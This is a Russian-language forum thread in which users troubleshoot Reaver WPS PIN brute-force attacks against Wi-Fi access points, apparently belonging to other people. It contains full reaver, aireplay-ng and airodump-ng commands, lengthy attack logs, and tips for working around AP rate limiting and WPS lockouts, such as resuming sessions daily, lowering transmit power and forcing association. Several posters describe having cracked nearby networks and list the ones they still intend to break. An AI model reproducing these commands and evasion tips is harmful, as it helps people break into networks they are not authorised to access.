Попробуй так: Code: reaver -i mon0 -b <target_mac> -vv -d 0 -S -w Если будут изменения какие-то - пиши... Пока идей никаких, будем пробовать методом тыка...
Как ты описал ЗЫ: ща тоже самое попробовал с aireplay - результата нет Code: reaver -i mon0 -b 08:86:3B:80:9F:5C -vv -d 0 -S -w Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [?] Restore previous session for 08:86:3B:80:9F:5C? [n/Y] y [+] Restored previous session [+] Waiting for beacon from 08:86:3B:80:9F:5C [+] Switching mon0 to channel 1 [+] Associated with 08:86:3B:80:9F:5C (ESSID: belkin.f5c) [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received M3 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 2 [+] Switching mon0 to channel 3 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] 1.76% complete @ 2012-07-31 14:44:04 (0 seconds/pin) [+] Trying pin 01845679 [+] Sending EAPOL START request
picat, тогда можно попробовать искусственно занизить мощность твоего адаптера/найти место, где сигнал будет не такой сильный, да и вообще перебор пойдёт... Иногда нужно банально передвинуть бук на пару десятков сантиметров в сторону, чтобы ривер заработал - СВЧ-диапазон, мать его) Для второго случая можно погулять по дому с буком и найти место, где будет сигнал в районе -65 dBm, а для первого случая попробуй что-то вроде Code: iwconfig wlan0 txpower 10 . Поиграй с параметром txpower - он задаёт максимальную выходную мощность беспроводного адаптера. Иногда точка захлёбывается сигналом и уходит в lock, когда сигнал слишком уж рьяный))) Апдейт: А вообще, перед всем, что я написал в посте выше, попробуй убрать -d 0. Иногда точка не успевает обрабатывать запросы, которыми её заваливает клиентская машинка...
H3L1X, забыл сказать, я txpower ставил Боливийские 30 - возможно причина в этом. Ща попробую по дефолту или даже на 10. Отпишусь, и благодарю за содействие
да ничего там не регулируеться в бэктреке, поставьте iwconfig wlan0 txpower 0 и удивляйтесь что всё работает...
Может кто помочь Когда сканирую точки выдает, 3 сети, из них все 3 WPS locked ( NO ) Начинаю взлом первой TP-link_FRESH, проверяет 6 пинов, дале появляется [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking ну и так без конца дето на сутку. Если в ето время включить мониторинг то уже показывает тоесть WPS locked с NO меняется на YES, через сутку обратно. Что делать ?
А ничего. Раз в сутки запускать ривер, продолжать сохраненную сессию, шажок за шажком.... У самого таких 2 точки - ч-з 10 пинов точки уходят в лок.
бывает и такое, только я после горького опыта стал записывать последний пин на бумаге, в случае не возможности продолжения сессии вбивал продолжение по маске.
как имено если он блокируется полностью на сутку ? Также может кто поможет. У меня второй адаптер TP-link TL-WN7200ND, BT5 R1, драйвер показывает rt2800usb. Мониторить он мониторит WPS. Но как только включаю подбор пинов к какой нибудь сети так процесс буксует на 1 пине, и куча ошибок. Пробовал разные сети, по разному прописывал. Вот лог с ВТ: Code: [+] Switching mon0 to channel 4 [+] Associated with F4:EC:38:AF:A2:96 (ESSID: Microsoft) [+] Trying pin 12345670 [+] Switching mon0 to channel 4 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin Что делать ? дело в драйвере ? если да, так какой ставить и как именно ? А то на родном адаптере ноута сломал 1 точку за 5 чесов, а на етом просто 0. Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.
Ghosttt открой еще одну вкладку терминала и Code: aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one
У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.
суть в том что я пробовал разные точки, результат 1. Даже пробую точку к которой 2 дня назад добыл пин к ВПС адаптером встроенным в ноут, результата 0 Traing pin 12345670. далее куча ошибок и опять Traing pin 12345670. потом пишет прогрес 0.00% и по второму кругу... не понимаю в чем проблема...адаптер Tp-link TL-WN7200ND вроде должен работать так как чип там rl3070 а на деле толку с WPS 0. Может у ково такой адаптер посоветуйте.
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне. А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?
У меня тоже такой чип под ви фи слакс 64-2 работает, но есть точки которые просто не подбираются не смотря на всякие уловки, есть netgear которая останавливается на 99989989 пишет что 99.9% и все, может здесь пины куда выкладывать к разным макам, чтобы проверять руками а?
пока никак наверно, если только терпением, я имел ввиду что после трех недельного брута примерно 80%, на следующий день отказался продолжать сессию (логи тоже были пусты), вот где не приятный сюрприз был, после этого случая если надо было подобрать пин к точке с такими симптомами, последний записывал на бумаге на всяк случай (как оказалось не зря, по крайней мере в моем случае). точка в конце концов сдалась конечно имхо конечно, но скоро халявный WPS прикрутят, с каждым разом все больше точек появляется без оного, спасибо системным администраторам обитающим по этим форумам. пардон за флуд, можете удалить
Ок опишу все как было. ОС ноутбуку 7, драйвер ТП-линковский с диска, пробовал от Альфы но мне показалось что стало ловить менше точек, переставил назад родной. Запускаю reaver через usb с загрузочной флешки. 1) airslax_1.2 там reaver 1.4 вшит, в папку модулс перепробывал много драйверов, мониторинг пошел после передьоргивания кабеля адаптера на драйвере rt2x00. Но после начала подбора пина выдайот что сбой присоеденения к точке. Родной адаптер ноутбука Broadcom прекрасно работает там же на драйвере b43, легко подобрал пин и сломал пароль к 1 точке за 5 с лишним часов. После, решыл что airslax плохо ладит с адаптером, решыл по старинке использовать провереный ВТ5. 2) BT5R1-GNOME-32, драйвер там автоматом показывает rt2800usb, установил reaver-1.4 все как положено. wash -i mon0 -C -s показывает несколько сетей. после беру например ту же сеть что уже сломал ранше, на ней перебор был 4 пина\сек, тоесть сигнал хорошый, а поскольку ТП линк сильнее так вопше должно было летать. Прописываю: reaver -i mon0 -b XX:XX:XX:XX:XX -vv или reaver -i mon0 -b XX:XX:XX:XX:XX -vv --dh-small и все, начинает буксувать на 1 пине = ступор. Пробывал как выше советовали в 2 окне прописывать: aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор. Если ето важно скопирую кину сюда лог. И в итоге толку 0. какой драйвер ты используеш ? Тоесть бросаеш в папку модулс ?
Если aireplay ругается на канал, нужно сначала запустить airodump с требуемым каналом, прим. Code: airodump-ng mon0 -c 4 Потом в другой вкладке запустить aireplay. После успешной ассоциации airodump следует отключить (он мешает корректной работе ривера). И далее запускаем ривер с включенным aireplay. Незнаю с чем связано, но у меня половина точек работают только с aireplay (причем при использовании aireplay существует вероятность пропустить правильный ПИН (у меня из 6 точек в 2х пропустил- пришлось заново))
Ghosttt Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.